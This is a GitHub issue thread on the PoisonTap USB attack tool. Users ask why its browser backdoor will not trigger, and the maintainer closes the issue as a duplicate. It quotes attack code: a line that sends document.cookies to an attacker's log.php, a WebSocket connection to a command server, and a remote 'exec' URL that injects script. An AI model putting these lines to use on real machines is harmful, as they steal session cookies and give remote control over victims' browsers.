Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

The back door does not work #32

Closed
double-pulsar opened this issue Nov 21, 2016 · 4 comments
Closed

The back door does not work #32

double-pulsar opened this issue Nov 21, 2016 · 4 comments

Comments

@double-pulsar
Copy link

double-pulsar commented Nov 21, 2016

I have setup poisontap in my nethunter nexus6p,when i plug into my win8.1 usb port,all network traffic is goto nexus6p,and phone screen can see my browser cookie.(eg youku.com)
i have modify the backdoor.html:
var socket = new WebSocket('ws://YOURDOMAIN:1337');
to
var socket = new WebSocket('ws://my IP:1337');

and modify the target_backdoor.js:
new Image().src='http://YOURDOMAIN/log.php?log='+document.cookies;
to
new Image().src='http://my IP/log.php?log='+document.cookies;
my online server is running backend_server.js listening port 1337 succesed and log.php is work
but when i use command http://my IP:1337/exec?alert("muahahahaha") (ps."my IP" is my server ip)
My browser nothing happened,why?
and When I visit the list of URLs in target_injected_xhtmljs.html
browser will jump to your video in the interface,What does it do?

How to trigger backdoor? thx!

@emboha
Copy link

emboha commented Dec 1, 2016

I'm in the exact same spot as u.
Did u solve your problem?

@double-pulsar
Copy link
Author

@emboha No,I am wait author to solve my problem too

@grimxd
Copy link

grimxd commented Dec 2, 2016

I am having the same issue. There is no websocket opened either with PI connected or disconnected from target PC.

@samyk
Copy link
Owner

samyk commented Dec 2, 2016

Dupe of #29, more details in there

@samyk samyk closed this as completed Dec 2, 2016
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

4 participants